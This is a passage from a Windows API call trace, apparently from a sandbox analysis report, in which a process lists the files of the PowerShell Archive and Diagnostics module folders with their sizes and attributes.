nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.257] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0226.257] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0226.257] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0226.257] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.258] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.258] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.258] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0226.258] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\", lpFilePart=0x0) returned 0x50 [0226.258] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.258] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.258] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.258] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0226.259] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0226.259] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.259] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.259] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.259] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.259] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0226.259] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0226.259] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf730 [0226.260] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.260] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0226.260] FindNextFileW (in: hFindFile=0x1a5cf730, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0226.260] FindClose (in: hFindFile=0x1a5cf730 | out: hFindFile=0x1a5cf730) returned 1 [0226.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe380) returned 1 [0226.261] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0226.261] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0226.261] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7fe020 | out: lpFindFileData=0x1b7fe020*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.261] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.261] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0226.262] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe070 | out: lpFindFileData=0x1b7fe070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.262] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2d0) returned 1 [0226.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe290) returned 1 [0226.262] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fdf70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0226.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3b0) returned 1 [0226.262] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe490 | out: lpFileInformation=0x1b7fe490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0226.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe370) returned 1 [0226.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe3e0) returned 1 [0226.262] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", nBufferLength=0x105, lpBuffer=0x1b7fded0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US", lpFilePart=0x0) returned 0x55 [0226.262] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", nBufferLength=0x105, lpBuffer=0x1b7fde70, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\", lpFilePart=0x0) returned 0x56 [0226.262] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\*", lpFindFileData=0x1b7fe080 | out: lpFindFileData=0x1b7fe080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.263] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.263] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 1 [0226.291] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe0d0 | out: lpFindFileData=0x1b7fe0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9aa85ed5, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9aa85ed5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9aa85ed5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x149c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ArchiveResources.psd1", cAlternateFileName="")) returned 0 [0226.292] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe330) returned 1 [0226.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe2f0) returned 1 [0226.292] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\en-US\\en-US.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\en-us\\en-us.psd1")) returned 0xffffffff [0226.293] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.294] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.294] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.294] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.295] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psd1", cAlternateFileName="")) returned 1 [0226.295] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0226.295] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0226.296] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.297] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.297] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.298] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0226.298] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0226.298] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0226.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.298] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.299] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.299] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, 